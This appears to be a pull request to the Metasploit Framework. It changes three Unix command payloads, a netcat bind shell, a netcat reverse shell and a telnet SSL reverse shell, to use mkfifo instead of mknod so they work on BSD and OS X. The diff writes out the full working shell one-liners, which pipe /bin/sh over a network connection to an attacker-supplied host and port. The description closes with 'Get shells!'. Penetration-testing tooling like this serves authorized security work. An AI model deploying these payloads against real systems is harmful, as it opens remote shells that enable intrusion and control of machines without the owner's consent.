### PR TITLE
Replace mknod with mkfifo for portability

### DIFF
--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -52,7 +52,7 @@ module MetasploitModule
   #
   def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mknod /tmp/#{backpipe} p; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+    "mkfifo /tmp/#{backpipe}; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
   end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb
@@ -19,7 +19,7 @@ module MetasploitModule
     super(merge_info(info,
       'Name'          => 'Unix Command Shell, Reverse TCP SSL (telnet)',
       'Description'   => %q{
-        Creates an interactive shell via mknod and telnet.
+        Creates an interactive shell via mkfifo and telnet.
         This method works on Debian and other systems compiled
         without /dev/tcp support. This module uses the '-z'
         option included on some systems to encrypt using SSL.
@@ -53,6 +53,6 @@ module MetasploitModule
   #
   def command_string
     pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
-    cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+    cmd = "mkfifo #{pipe_name} && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -52,7 +52,7 @@ module MetasploitModule
   #
   def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mknod /tmp/#{backpipe} p; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
+    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
   end
 
 end


### PR DESCRIPTION
**What is it?**

`mknod` allows you to create "special files" such as character and block devices. `mkfifo` creates FIFOs (named pipes). `cmd/unix/reverse_netcat`, `cmd/unix/bind_netcat`, and `cmd/unix/reverse_bash_telnet_ssl` all use `mknod`.

**Why doesn't it work?**

GNU coreutils supplies a `mknod` that can create FIFOs, but BSDs and OS X have a `mknod` that doesn't have that ability. `mkfifo` is a much more portable solution that will allow FIFO-based shells to work on Linux, BSD, and OS X.

ETA: Some embedded systems have only `mknod`, so this should really have been configurable.

**Verification steps:**
- [x] `mknod /dev/null p` on a BSD or OS X
- [x] Note the error saying you can't do that
- [ ] Test the changed payloads on Linux, BSD, and OS X
- [ ] Get shells!
